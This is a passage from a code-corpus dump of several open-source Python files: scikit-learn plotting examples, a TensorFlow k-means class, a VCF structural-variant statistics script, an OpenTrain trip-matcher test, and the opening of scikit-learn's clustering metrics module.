print("Estimated coefficients (true, normal, RANSAC):")
print(coef, model.coef_, model_ransac.estimator_.coef_)
plt.plot(X[inlier_mask], y[inlier_mask], '.g', label='Inliers')
plt.plot(X[outlier_mask], y[outlier_mask], '.r', label='Outliers')
plt.plot(line_X, line_y, '-k', label='Linear regressor')
plt.plot(line_X, line_y_ransac, '-b', label='RANSAC regressor')
plt.legend(loc='lower right')
plt.show()
| bsd-3-clause |
themrmax/scikit-learn | examples/tree/plot_iris.py | 86 | 1965 | """
================================================================
Plot the decision surface of a decision tree on the iris dataset
================================================================
Plot the decision surface of a decision tree trained on pairs
of features of the iris dataset.
See :ref:`decision tree <tree>` for more information on the estimator.
For each pair of iris features, the decision tree learns decision
boundaries made of combinations of simple thresholding rules inferred from
the training samples.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.tree import DecisionTreeClassifier
# Parameters
n_classes = 3
# One matplotlib colour character per class (blue, red, yellow).
plot_colors = "bry"
plot_step = 0.02
# Load data
iris = load_iris()
# One subplot per unordered pair of the four iris features.
for pairidx, pair in enumerate([[0, 1], [0, 2], [0, 3],
                                [1, 2], [1, 3], [2, 3]]):
    # We only take the two corresponding features
    X = iris.data[:, pair]
    y = iris.target
    # Train
    clf = DecisionTreeClassifier().fit(X, y)
    # Plot the decision boundary on a dense grid covering the data extent.
    plt.subplot(2, 3, pairidx + 1)
    x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
    y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
    xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),
                         np.arange(y_min, y_max, plot_step))
    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
    Z = Z.reshape(xx.shape)
    cs = plt.contourf(xx, yy, Z, cmap=plt.cm.Paired)
    plt.xlabel(iris.feature_names[pair[0]])
    plt.ylabel(iris.feature_names[pair[1]])
    plt.axis("tight")
    # Plot the training points
    for i, color in zip(range(n_classes), plot_colors):
        idx = np.where(y == i)
        plt.scatter(X[idx, 0], X[idx, 1], c=color, label=iris.target_names[i],
                    cmap=plt.cm.Paired)
    plt.axis("tight")
plt.suptitle("Decision surface of a decision tree using paired features")
plt.legend()
plt.show()
| bsd-3-clause |
Obus/scikit-learn | examples/manifold/plot_mds.py | 261 | 2616 | """
=========================
Multi-dimensional scaling
=========================
An illustration of the metric and non-metric MDS on generated noisy data.
The reconstructed points using the metric MDS and non metric MDS are slightly
shifted to avoid overlapping.
"""
# Author: Nelle Varoquaux <nelle.varoquaux@gmail.com>
# Licence: BSD
print(__doc__)
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.collections import LineCollection
from sklearn import manifold
from sklearn.metrics import euclidean_distances
from sklearn.decomposition import PCA
n_samples = 20
seed = np.random.RandomState(seed=3)
# NOTE(review): np.float is removed in modern NumPy -- use float.
X_true = seed.randint(0, 20, 2 * n_samples).astype(np.float)
X_true = X_true.reshape((n_samples, 2))
# Center the data
X_true -= X_true.mean()
similarities = euclidean_distances(X_true)
# Add noise to the similarities (symmetric, zero diagonal).
noise = np.random.rand(n_samples, n_samples)
noise = noise + noise.T
noise[np.arange(noise.shape[0]), np.arange(noise.shape[0])] = 0
similarities += noise
# Metric MDS on the precomputed (noisy) dissimilarity matrix.
mds = manifold.MDS(n_components=2, max_iter=3000, eps=1e-9, random_state=seed,
                   dissimilarity="precomputed", n_jobs=1)
pos = mds.fit(similarities).embedding_
# Non-metric MDS, initialised from the metric solution.
nmds = manifold.MDS(n_components=2, metric=False, max_iter=3000, eps=1e-12,
                    dissimilarity="precomputed", random_state=seed, n_jobs=1,
                    n_init=1)
npos = nmds.fit_transform(similarities, init=pos)
# Rescale the data so both embeddings match the true point cloud's norm.
pos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((pos ** 2).sum())
npos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((npos ** 2).sum())
# Rotate the data into a common principal-axes frame for visual comparison.
clf = PCA(n_components=2)
X_true = clf.fit_transform(X_true)
pos = clf.fit_transform(pos)
npos = clf.fit_transform(npos)
fig = plt.figure(1)
ax = plt.axes([0., 0., 1., 1.])
plt.scatter(X_true[:, 0], X_true[:, 1], c='r', s=20)
plt.scatter(pos[:, 0], pos[:, 1], s=20, c='g')
plt.scatter(npos[:, 0], npos[:, 1], s=20, c='b')
plt.legend(('True position', 'MDS', 'NMDS'), loc='best')
# Invert distances into edge weights for the line collection below.
similarities = similarities.max() / similarities * 100
similarities[np.isinf(similarities)] = 0
# Plot the edges
start_idx, end_idx = np.where(pos)
# a sequence of (*line0*, *line1*, *line2*), where::
#     linen = (x0, y0), (x1, y1), ... (xm, ym)
segments = [[X_true[i, :], X_true[j, :]]
            for i in range(len(pos)) for j in range(len(pos))]
values = np.abs(similarities)
lc = LineCollection(segments,
                    zorder=0, cmap=plt.cm.hot_r,
                    norm=plt.Normalize(0, values.max()))
lc.set_array(similarities.flatten())
lc.set_linewidths(0.5 * np.ones(len(segments)))
ax.add_collection(lc)
plt.show()
| bsd-3-clause |
jmhsi/justin_tinker | data_science/courses/deeplearning2/kmeans.py | 10 | 2802 | import tensorflow as tf
import math, numpy as np
import matplotlib.pyplot as plt
def plot_data(centroids, data, n_samples):
    """Scatter each cluster's samples in its own colour and mark centroids with an 'x'."""
    colour = plt.cm.rainbow(np.linspace(0,1,len(centroids)))
    for i, centroid in enumerate(centroids):
        # Assumes data is grouped by cluster in contiguous chunks of
        # n_samples rows -- TODO confirm against the caller.
        samples = data[i*n_samples:(i+1)*n_samples]
        plt.scatter(samples[:,0], samples[:,1], c=colour[i], s=1)
        # Black outer 'x' with a magenta inner 'x' on top for visibility.
        plt.plot(centroid[0], centroid[1], markersize=10, marker="x", color='k', mew=5)
        plt.plot(centroid[0], centroid[1], markersize=5, marker="x", color='m', mew=2)
def all_distances(a, b):
    # Pairwise squared Euclidean distances via broadcasting:
    # a -> (1, len(a), dim), b -> (len(b), 1, dim); summing the squared
    # differences over the last axis yields a (len(b), len(a)) matrix,
    # i.e. rows index b and columns index a.
    diff = tf.squared_difference(tf.expand_dims(a, 0), tf.expand_dims(b,1))
    return tf.reduce_sum(diff, axis=2)
class Kmeans(object):
    """K-means clustering built on the TensorFlow 1.x graph/session API.

    A default session must be active when the methods run (they use
    ``.eval()`` / implicit-session ops).  Initial centroids come from a
    farthest-point heuristic; ``run`` then performs up to 10 Lloyd update
    rounds, stopping early once the centroids converge.
    """

    def __init__(self, data, n_clusters):
        # data: (n_data, n_dim) array of points, kept both as a plain array
        # and as a TF variable so graph ops can read it.
        self.n_data, self.n_dim = data.shape
        self.n_clusters = n_clusters
        self.data = data
        self.v_data = tf.Variable(data)
        self.n_samples = self.n_data//self.n_clusters

    def run(self):
        """Run the clustering; return the final (n_clusters, n_dim) centroids."""
        tf.global_variables_initializer().run()
        initial_centroids = self.find_initial_centroids(self.n_clusters).eval()
        curr_centroids = tf.Variable(initial_centroids)
        nearest_indices = self.assign_to_nearest(curr_centroids)
        updated_centroids = self.update_centroids(nearest_indices)
        # Begin main algorithm (re-initialise so curr_centroids is live).
        tf.global_variables_initializer().run()
        c = initial_centroids
        for i in range(10):
            c2 = curr_centroids.assign(updated_centroids).eval()
            # Converged: the update no longer moves the centroids.
            if np.allclose(c, c2):
                break
            c = c2
        return c2

    def find_initial_centroids(self, k):
        """Farthest-point seeding: start from a random point, then repeatedly
        add the point farthest from the centroids chosen so far."""
        r_index = tf.random_uniform([1], 0, self.n_data, dtype=tf.int32)
        r = tf.expand_dims(self.v_data[tf.squeeze(r_index)], dim=1)
        initial_centroids = []
        for i in range(k):
            # dist has shape (centroids, points); min over axis 0 gives each
            # point's distance to its closest centroid so far.
            dist = all_distances(self.v_data, r)
            farthest_index = tf.argmax(tf.reduce_min(dist, axis=0), 0)
            farthest_point = self.v_data[tf.to_int32(farthest_index)]
            initial_centroids.append(farthest_point)
            r = tf.stack(initial_centroids)
        return r

    def choose_random_centroids(self):
        """Alternative seeding: sample n_clusters points uniformly at random.

        Bug fix: the original referenced the unbound name ``v_data`` and
        raised a NameError when called; it now uses ``self.v_data``.
        """
        n_samples = tf.shape(self.v_data)[0]
        random_indices = tf.random_shuffle(tf.range(0, n_samples))
        centroid_indices = random_indices[:self.n_clusters]
        return tf.gather(self.v_data, centroid_indices)

    def assign_to_nearest(self, centroids):
        """Return, for each data point, the index of its nearest centroid."""
        return tf.argmin(all_distances(self.v_data, centroids), 0)

    def update_centroids(self, nearest_indices):
        """Recompute each centroid as the mean of the points assigned to it."""
        partitions = tf.dynamic_partition(self.v_data, tf.to_int32(nearest_indices), self.n_clusters)
        return tf.concat([tf.expand_dims(tf.reduce_mean(partition, 0), 0)
                          for partition in partitions], 0)
| apache-2.0 |
quheng/scikit-learn | examples/cluster/plot_kmeans_stability_low_dim_dense.py | 338 | 4324 | """
============================================================
Empirical evaluation of the impact of k-means initialization
============================================================
Evaluate the ability of k-means initializations strategies to make
the algorithm convergence robust as measured by the relative standard
deviation of the inertia of the clustering (i.e. the sum of distances
to the nearest cluster center).
The first plot shows the best inertia reached for each combination
of the model (``KMeans`` or ``MiniBatchKMeans``) and the init method
(``init="random"`` or ``init="kmeans++"``) for increasing values of the
``n_init`` parameter that controls the number of initializations.
The second plot demonstrate one single run of the ``MiniBatchKMeans``
estimator using a ``init="random"`` and ``n_init=1``. This run leads to
a bad convergence (local optimum) with estimated centers stuck
between ground truth clusters.
The dataset used for evaluation is a 2D grid of isotropic Gaussian
clusters widely spaced.
"""
print(__doc__)
# Author: Olivier Grisel <olivier.grisel@ensta.org>
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from sklearn.utils import shuffle
from sklearn.utils import check_random_state
from sklearn.cluster import MiniBatchKMeans
from sklearn.cluster import KMeans
random_state = np.random.RandomState(0)
# Number of run (with randomly generated dataset) for each strategy so as
# to be able to compute an estimate of the standard deviation
n_runs = 5
# k-means models can do several random inits so as to be able to trade
# CPU time for convergence robustness
n_init_range = np.array([1, 5, 10, 15, 20])
# Datasets generation parameters
n_samples_per_center = 100
grid_size = 3
scale = 0.1
n_clusters = grid_size ** 2
def make_data(random_state, n_samples_per_center, grid_size, scale):
    """Generate isotropic Gaussian blobs centred on a grid_size x grid_size grid.

    Returns shuffled (X, y) where y is the index of the generating centre.
    """
    random_state = check_random_state(random_state)
    centers = np.array([[i, j]
                        for i in range(grid_size)
                        for j in range(grid_size)])
    n_clusters_true, n_features = centers.shape
    # One shared noise block, offset by each centre in turn.
    noise = random_state.normal(
        scale=scale, size=(n_samples_per_center, centers.shape[1]))
    X = np.concatenate([c + noise for c in centers])
    y = np.concatenate([[i] * n_samples_per_center
                        for i in range(n_clusters_true)])
    return shuffle(X, y, random_state=random_state)
# Part 1: Quantitative evaluation of various init methods
fig = plt.figure()
plots = []
legends = []
# (estimator class, init strategy, extra constructor kwargs)
cases = [
    (KMeans, 'k-means++', {}),
    (KMeans, 'random', {}),
    (MiniBatchKMeans, 'k-means++', {'max_no_improvement': 3}),
    (MiniBatchKMeans, 'random', {'max_no_improvement': 3, 'init_size': 500}),
]
for factory, init, params in cases:
    print("Evaluation of %s with %s init" % (factory.__name__, init))
    inertia = np.empty((len(n_init_range), n_runs))
    for run_id in range(n_runs):
        X, y = make_data(run_id, n_samples_per_center, grid_size, scale)
        for i, n_init in enumerate(n_init_range):
            km = factory(n_clusters=n_clusters, init=init, random_state=run_id,
                         n_init=n_init, **params).fit(X)
            inertia[i, run_id] = km.inertia_
    # Error bars: mean +/- std of the inertia across the n_runs datasets.
    p = plt.errorbar(n_init_range, inertia.mean(axis=1), inertia.std(axis=1))
    plots.append(p[0])
    legends.append("%s with %s init" % (factory.__name__, init))
plt.xlabel('n_init')
plt.ylabel('inertia')
plt.legend(plots, legends)
plt.title("Mean inertia for various k-means init across %d runs" % n_runs)
# Part 2: Qualitative visual inspection of the convergence
X, y = make_data(random_state, n_samples_per_center, grid_size, scale)
# A single random init is likely to land in a bad local optimum.
km = MiniBatchKMeans(n_clusters=n_clusters, init='random', n_init=1,
                     random_state=random_state).fit(X)
fig = plt.figure()
for k in range(n_clusters):
    my_members = km.labels_ == k
    color = cm.spectral(float(k) / n_clusters, 1)
    plt.plot(X[my_members, 0], X[my_members, 1], 'o', marker='.', c=color)
    cluster_center = km.cluster_centers_[k]
    plt.plot(cluster_center[0], cluster_center[1], 'o',
             markerfacecolor=color, markeredgecolor='k', markersize=6)
plt.title("Example cluster allocation with a single random init\n"
          "with MiniBatchKMeans")
plt.show()
| bsd-3-clause |
bioinformatics-centre/AsmVar | src/AsmvarVarScore/AGE_Stat.py | 2 | 8989 | """
========================================================
Statistic the SV Stat after AGE Process
========================================================
Author : Shujia Huang
Date : 2014-03-07 0idx:54:15
"""
import sys
import re
import os
import string
import numpy as np
import matplotlib.pyplot as plt
def DrawFig( figureFile, distance, leftIden, rigthIden, nr, aa, bb ) :
    """Plot four annotation-vs-score panels and save <figureFile>.png/.pdf.

    Each of distance/nr/aa/bb is an (n, 3) array of [mark, score, value]
    rows; mark 1/2/3 = positive/negative/both training site, 0 = new site.
    NOTE(review): leftIden and rigthIden (sic) are accepted but never used.
    """
    fig = plt.figure( num=None, figsize=(16, 18), facecolor='w', edgecolor='k' )
    title = ['Distance distribution', 'NRatio', 'Perfect Depth', 'Imperfect depth']
    ylabel = ['The position of breakpoint', \
              'N Ratio of varints', 'Perfect Depth', 'Both ImPerfect Depth']
    for i, data in enumerate ( [ distance, nr, aa, bb ] ) :
        # Left column: training sites coloured by their mark.
        plt.subplot(4,2,2 * i + 1)
        #plt.title(title[i], fontsize=16)
        P = data[:,0] == 1; N = data[:,0] == 2; X = data[:,0] == 3
        plt.scatter(data[:,1][P], data[:,2][P], marker='o', c = 'g', alpha=0.3, linewidths = 0, label = 'Positive' ) # Positive
        plt.scatter(data[:,1][N], data[:,2][N], marker='o', c = 'r', alpha=0.3, linewidths = 0, label = 'Negative' ) # Negative
        plt.scatter(data[:,1][X], data[:,2][X], marker='o', c = 'Y', alpha=0.3, linewidths = 0, label = 'Positive->Negative' ) # Positive->Negative
        plt.legend(loc='upper right')
        plt.xlabel('Score' , fontsize=16)
        plt.ylabel ( ylabel[i] , fontsize=16 )
        # Right column: new (untrained) sites, split at score 1.0.
        plt.subplot(4, 2, 2*i + 2)
        NEW = data[:,0] == 0
        good = data[:,1][NEW] >= 1.0; bad = data[:,1][NEW] < 1.0
        plt.scatter( data[:,1][NEW][good], data[:,2][NEW][good], marker='o', c = 'b', alpha=0.4, linewidths = 0, label = 'good' ) # good
        plt.scatter( data[:,1][NEW][bad] , data[:,2][NEW][bad] , marker='o', c = 'm', alpha=0.4, linewidths = 0, label = 'bad' ) # bad
        plt.legend(loc='upper right')
        plt.xlabel('Score' , fontsize=16)
    fig.savefig(figureFile + '.png')
    fig.savefig(figureFile + '.pdf')
def Accum(data, isBig=False):
    """Return cumulative counts per numeric-string key, without mutating *data*.

    *data* maps a numeric string key to a ``[count, base]`` pair.  The result
    is a list of ``[key_as_float, count, base + cumulative_count]`` rows
    ordered by numeric key.  With ``isBig=False`` the cumulative sum runs
    from the smallest key up to and including the current one; with
    ``isBig=True`` it runs from the current key up to the largest.

    Fixes vs. the original: the caller's dict is no longer modified in place
    (the old code aliased *data* and mutated its value lists), and the
    accumulation is O(n) instead of O(n^2).
    """
    keys = sorted(data.keys(), key=lambda d: float(d))
    counts = [float(data[k][0]) for k in keys]
    acc, cums = 0.0, []
    if isBig:
        # Suffix sums: accumulate from the largest key downwards.
        for c in reversed(counts):
            acc += c
            cums.append(acc)
        cums.reverse()
    else:
        # Prefix sums: accumulate from the smallest key upwards.
        for c in counts:
            acc += c
            cums.append(acc)
    return [[float(k), c, float(data[k][1]) + s]
            for k, c, s in zip(keys, counts, cums)]
def SampleFaLen(faLenFile):
    """Read a two-column "<name> <length>" file into a {name: int length} dict.

    Files ending in '.gz' are decompressed through an external ``gzip -dc``
    pipe, as in the original implementation.

    Fixes vs. the original: ``string.atoi`` (removed in Python 3; ``int``
    behaves the same here on both versions) is replaced, and the handle is
    always closed, even if a line fails to parse.
    """
    if faLenFile[-3:] == '.gz':
        I = os.popen('gzip -dc %s' % faLenFile)
    else:
        I = open(faLenFile)
    data = {}
    try:
        for line in I:
            col = line.strip('\n').split()
            data[col[0]] = int(col[1])
    finally:
        I.close()
    return data
def LoadFaLen(faLenLstFile):
    """Load per-sample FASTA length tables from a "sample lengths_file" list.

    Each line of *faLenLstFile* names a sample and the path of its length
    file; the latter is parsed with SampleFaLen.  Returns
    {sample_id: {sequence_name: length}}.
    """
    data = {}
    handle = open(faLenLstFile)
    for line in handle.readlines():
        fields = line.strip('\n').split()
        if len(fields) != 2:
            raise ValueError('[ERROR] The format of Fa length list maybe not right. It could just be : "sample FalenghtFile", but found', line)
        sampleId, fileName = fields
        if sampleId not in data:
            data[sampleId] = {}
        data[sampleId] = SampleFaLen(fileName)
    handle.close()
    return data
def main ( argv ) :
    # argv[0]: VCF file (optionally .gz), argv[1]: Fa-length list file,
    # optional argv[2]: output figure prefix.  Python 2 only (print
    # statements, string.atoi/atof).
    qFaLen = LoadFaLen( argv[1] )
    figPrefix = 'test'
    if len(argv) > 2 : figPrefix = argv[2]
    if argv[0][-3:] == '.gz' :
        I = os.popen( 'gzip -dc %s' % argv[0] )
    else :
        I = open ( argv[0] )
    # s: seen chr:pos keys (dedup); annotations: per-sample feature rows;
    # mark: per-variant [train-site class, variant quality].
    s, annotations, mark = set(), [], []
    print '#Chr\tPosition\tDistance\tLeftIden\tRightIden\tAveIden\tN-Ratio\tAA'
    while 1 : # read the VCF in chunks of lines
        lines = I.readlines( 100000 )
        if not lines : break
        for line in lines :
            col = line.strip('\n').split()
            # Map sample column index -> sample name from the #CHROM header.
            # NOTE(review): col2sam is unbound if no #CHROM line precedes data.
            if re.search( r'^#CHROM', line ) : col2sam = { i+9:sam for i,sam in enumerate(col[9:]) }
            if re.search(r'^#', line) : continue
            key = col[0] + ':' + col[1]
            if key in s : continue
            s.add(key)
            #if re.search(r'^PASS', col[6] ) : continue
            #if not re.search(r'_TRAIN_SITE', col[7]) : continue
            if not re.search(r'^PASS', col[6] ) : continue
            # fmat: FORMAT key -> index within each sample field.
            fmat = { k:i for i,k in enumerate( col[8].split(':') ) }
            if 'VS' not in fmat or 'QR' not in fmat: continue
            if len(annotations) == 0 : annotations = [ [] for _ in col[9:] ]
            vcfinfo = { d.split('=')[0] : d.split('=')[1] for d in col[7].split(';') if len(d.split('=')) == 2 }
            vq = string.atof( vcfinfo['VQ'] )
            # Train-site class: 3 = both, 1 = positive, 2 = negative, 0 = none.
            if 'POSITIVE_TRAIN_SITE' in col[7] and 'NEGATIVE_TRAIN_SITE' in col[7] :
                mark.append( [3, vq] )
            elif 'POSITIVE_TRAIN_SITE' in col[7] :
                mark.append( [1, vq] )
            elif 'NEGATIVE_TRAIN_SITE' in col[7] :
                mark.append( [2, vq] )
            else :
                mark.append( [0, vq] )
            for i, sample in enumerate ( col[9:] ) :
                sampleId = col2sam[9+i]
                qr = sample.split(':')[fmat['QR']].split(',')[-1]
                if qr == '.' :
                    # Missing query region: all-zero feature row.
                    annotations[i].append( [0, 0, 0, 0, 0, 0] )
                    continue
                qId, qSta, qEnd = qr.split('-')
                qSta = string.atoi(qSta)
                qEnd = string.atoi(qEnd)
                # NOTE(review): '$s' below looks like a typo for '%s'; this
                # raise would itself fail with a formatting TypeError.
                if sampleId not in qFaLen : raise ValueError ('[ERROR] The sample name $s(in vcf) is not in the name of Fa list.' % sampleId )
                # NOTE(review): 'opt' is undefined here; this raise would
                # itself fail with a NameError if ever reached.
                if qId not in qFaLen[sampleId] : raise ValueError ('[ERROR]', qId, 'is not been found in file', opt.qFalen, '\n' )
                # Convert breakpoint positions to percent of scaffold length.
                qSta= int( qSta * 100 / qFaLen[sampleId][qId] + 0.5 )
                qEnd= int( qEnd * 100 / qFaLen[sampleId][qId] + 0.5 )
                if qSta > 100 or qEnd > 100 : raise ValueError ('[ERROR] Query size Overflow! sample : %s; scaffold : %s' % (sampleId, qId) )
                # leg: distance of the breakpoint to the nearer scaffold end.
                leg = qSta
                if 100 - qEnd < qSta : leg = qEnd
                nn = string.atof(sample.split(':')[fmat['FN']])
                n = round( 1000 * nn ) / 10.0
                alt = string.atoi( sample.split(':')[fmat['AA']].split(',')[1] ) # Alternate perfect
                bot = string.atoi( sample.split(':')[fmat['AA']].split(',')[3] ) # Both imperfect
                pro = string.atoi( sample.split(':')[fmat['RP']].split(',')[0] ) # Proper Pair
                ipr = string.atoi( sample.split(':')[fmat['RP']].split(',')[1] ) # ImProper Pair
                annotations[i].append( [leg, n, alt, bot, pro, ipr] )
    I.close()
    if len( mark ) != len( annotations[0] ) : raise ValueError ('[ERROR] The size is not match!')
    annotations = np.array( annotations );
    sampleNum = len( annotations )
    # Z-score normalisation per sample, using only non-empty feature rows.
    for i in range( sampleNum ) :
        if np.sum(annotations[i]) == 0: continue
        mean = np.array( [ d for d in annotations[i] if np.sum(d) > 0 ] ).mean(axis=0)
        std = np.array( [ d for d in annotations[i] if np.sum(d) > 0 ] ).std (axis=0)
        annotations[i] = np.array( (annotations[i] - mean)/std ) # Normalization Per sample
        print >> sys.stderr, '# Sample NO.', i + 1,'\n', mean,'\n', std
    data, distance, leftIdn, rightIdn, nr, aa, bb = [],[],[],[],[],[],[]
    # Aggregate each training-site variant across samples by the median.
    # NOTE(review): the unpacked names leftIden/rightIden actually hold the
    # pro/ipr (proper/improper pair) columns of the feature rows.
    for i in range( len(annotations[0]) ) :
        if not mark[i][0] : continue # skip non-training sites (mark == 0)
        anno = np.array( [ annotations[s][i] for s in range( sampleNum ) if len(annotations[s][i][annotations[s][i]!=0]) > 0 ] ) # each person in the same position
        if len( anno ) == 0 : continue
        leg, n, alt, bot, leftIden, rightIden = np.median( anno, axis=0 )
        distance.append( [ mark[i][0], mark[i][1], leg ] )
        leftIdn.append ( [ mark[i][0], mark[i][1], leftIden ] )
        rightIdn.append( [ mark[i][0], mark[i][1], rightIden ] )
        nr.append ( [ mark[i][0], mark[i][1], n ] )
        aa.append ( [ mark[i][0], mark[i][1], alt ] )
        bb.append ( [ mark[i][0], mark[i][1], bot ] )
        data.append([leg, alt, leftIden, rightIden, n, bot])
        print mark[i][0], mark[i][1], '\t', leg, '\t', leftIden, '\t', rightIden,'\t', n, '\t', alt, '\t', bot
    data = np.array(data)
    # Summary statistics go to stderr so stdout stays machine-parseable.
    print >> sys.stderr, '\nPosition\tALTernatePerfect\tLeftIdentity\tRightIdentity\tAveIden\tNRatio\tBothImperfect'
    print >> sys.stderr, 'Means: ', data.mean(axis=0), '\nstd : ', data.std(axis=0), '\nMedian: ', np.median( data, axis=0 )
    print >> sys.stderr, '25 Percentile:', np.percentile(data, 25,axis=0), '\n50 Percentile:', np.percentile(data, 50,axis=0), '\n75 Percentile:', np.percentile(data, 75,axis=0)
    DrawFig( figPrefix, \
             np.array (distance ), \
             np.array (leftIdn  ), \
             np.array (rightIdn ), \
             np.array (nr       ), \
             np.array (aa       ), \
             np.array (bb       ) )
if __name__ == '__main__' :
    main(sys.argv[1:])
| mit |
hasadna/OpenTrain | webserver/opentrain/algorithm/trip_matcher_test.py | 1 | 3681 | """ comment
export DJANGO_SETTINGS_MODULE="opentrain.settings"
"""
import os
import sys
sys.path.append(os.getcwd())
sys.path.append(os.path.dirname(os.getcwd()))
os.environ['DJANGO_SETTINGS_MODULE']='opentrain.settings'
#/home/oferb/docs/train_project/OpenTrains/webserver
import timetable.services
import analysis.models
import numpy as np
from scipy import spatial
try:
import matplotlib.pyplot as plt
except ImportError:
pass
import config
import itertools
import datetime
from unittest import TestCase
import unittest
import time
from display_utils import *
from export_utils import *
from train_tracker import add_report, get_trusted_trips
import stops
from common.mock_reports_generator import generate_mock_reports
from analysis.models import SingleWifiReport
from redis_intf.client import get_redis_pipeline, get_redis_client
from stop_detector import DetectedStopTime
from trip_matcher import get_matched_trips
import random
import cProfile
class trip_matcher_test(TestCase):
def test_matcher_on_full_trip(self, trip_id = '010714_00115'):
detected_stop_times_gtfs, day = self.load_trip_info_for_matcher(trip_id)
trip_delays_ids_list_of_lists = get_matched_trips('test_matcher_on_full_trip', detected_stop_times_gtfs,\
day)
self.assertEquals(len(trip_delays_ids_list_of_lists), 1)
matched_trip_ids = get_trusted_trips(trip_delays_ids_list_of_lists)
self.assertEquals(matched_trip_ids[0], trip_id)
def test_matcher_on_trip_set(self, trip_ids = ['010714_00283', '010714_00115']):
detected_stop_times_gtfs_all = []
for trip_id in trip_ids:
detected_stop_times_gtfs, day = self.load_trip_info_for_matcher(trip_id)
detected_stop_times_gtfs_all += detected_stop_times_gtfs
trip_delays_ids_list_of_lists = get_matched_trips('test_matcher_on_full_trip', detected_stop_times_gtfs_all,\
day)
self.assertEquals(len(trip_delays_ids_list_of_lists), 2)
matched_trip_ids = sorted(get_trusted_trips(trip_delays_ids_list_of_lists))
self.assertEquals(matched_trip_ids, sorted(trip_ids))
def test_matcher_on_partial_random_trip(self, trip_id = '010714_00115', seeds=[0,1,2,3], stop_counts=[3,4,5]):
for seed in seeds:
for stop_count in stop_counts:
print 'seed =', seed, 'stop_count =', stop_count
detected_stop_times_gtfs, day = self.load_trip_info_for_matcher(trip_id)
random.seed(seed)
subset_inds = sorted(random.sample(xrange(0,len(detected_stop_times_gtfs)),stop_count))
detected_stop_times_gtfs_subset = [detected_stop_times_gtfs[i] for i in subset_inds]
trip_delays_ids_list_of_lists = get_matched_trips('test_matcher_on_full_trip', detected_stop_times_gtfs,\
day)
self.assertEquals(len(trip_delays_ids_list_of_lists), 1)
matched_trip_ids = get_trusted_trips(trip_delays_ids_list_of_lists)
self.assertEquals(matched_trip_ids[0], unicode(trip_id))
def load_trip_info_for_matcher(self, trip_id):
day = datetime.datetime.strptime(trip_id.split('_')[0], '%d%m%y').date()
trip = timetable.services.get_trip(trip_id)
stop_times_gtfs = trip.get_stop_times()
detected_stop_times_gtfs = [DetectedStopTime.load_from_gtfs(x, day) for x in stop_times_gtfs]
return detected_stop_times_gtfs, day
# Run the unittest test discovery/runner when executed as a script.
if __name__ == '__main__':
    unittest.main()
| bsd-3-clause |
luo66/scikit-learn | sklearn/metrics/cluster/supervised.py | 207 | 27395 | """Utilities to evaluate the clustering performance of models
Functions named as *_score return a scalar value to maximize: the higher the
better.
"""
# Authors: Olivier Grisel <olivier.grisel@ensta.org>
# Wei LI <kuantkid@gmail.com>
# Diego Molla <dmolla-aliod@gmail.com>
# License: BSD 3 clause
from math import log
from scipy.misc import comb
from scipy.sparse import coo_matrix
import numpy as np
from .expected_mutual_info_fast import expected_mutual_information
from ...utils.fixes import bincount
def comb2(n):
    """Return the number of unordered pairs among ``n`` items, i.e. C(n, 2).

    The exact integer variant of ``comb`` is faster for k == 2, so it is
    used by default throughout this module instead of the float
    approximation.
    """
    return comb(n, 2, exact=1)
def check_clusterings(labels_true, labels_pred):
    """Validate a pair of clusterings and return them as 1D numpy arrays.

    Raises ``ValueError`` when either labeling is not one-dimensional or
    when the two labelings differ in length.
    """
    labels_true = np.asarray(labels_true)
    labels_pred = np.asarray(labels_pred)

    # Both labelings must be flat vectors.
    for name, labels in (("labels_true", labels_true),
                         ("labels_pred", labels_pred)):
        if labels.ndim != 1:
            raise ValueError(
                "%s must be 1D: shape is %r" % (name, labels.shape))
    # ... and must describe the same set of samples.
    if labels_true.shape != labels_pred.shape:
        raise ValueError(
            "labels_true and labels_pred must have same size, got %d and %d"
            % (labels_true.shape[0], labels_pred.shape[0]))
    return labels_true, labels_pred
def contingency_matrix(labels_true, labels_pred, eps=None):
    """Build a contingency matrix describing the relationship between labels.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate
    eps : None or float
        If a float, that value is added to all values in the contingency
        matrix. This helps to stop NaN propagation.
        If ``None``, nothing is adjusted.

    Returns
    -------
    contingency : array, shape=[n_classes_true, n_classes_pred]
        Matrix :math:`C` such that :math:`C_{i, j}` is the number of samples
        in true class :math:`i` and in predicted class :math:`j`. If
        ``eps is None``, the dtype of this array will be integer. If ``eps``
        is given, the dtype will be float.
    """
    classes, class_idx = np.unique(labels_true, return_inverse=True)
    clusters, cluster_idx = np.unique(labels_pred, return_inverse=True)
    n_classes = classes.shape[0]
    n_clusters = clusters.shape[0]
    # Using coo_matrix to accelerate simple histogram calculation,
    # i.e. bins are consecutive integers.
    # Currently, coo_matrix is faster than histogram2d for simple cases.
    # BUG FIX: ``np.int`` was a deprecated alias of the builtin ``int`` and
    # has been removed in NumPy >= 1.24; use ``int`` directly.
    contingency = coo_matrix((np.ones(class_idx.shape[0]),
                              (class_idx, cluster_idx)),
                             shape=(n_classes, n_clusters),
                             dtype=int).toarray()
    if eps is not None:
        # don't use += as contingency is integer
        contingency = contingency + eps
    return contingency
# clustering measures
def adjusted_rand_score(labels_true, labels_pred):
    """Rand index adjusted for chance.

    The Rand Index considers all pairs of samples and counts pairs that are
    assigned consistently in the predicted and in the true clusterings.  The
    raw RI score is then adjusted for chance:

        ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)

    so random labelings score close to 0.0 independently of the number of
    clusters and samples, and identical clusterings (up to a permutation of
    the labels) score exactly 1.0.  ARI is symmetric in its arguments.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference.
    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate.

    Returns
    -------
    ari : float
        Similarity score between -1.0 and 1.0. Random labelings have an ARI
        close to 0.0; 1.0 stands for a perfect match.

    References
    ----------
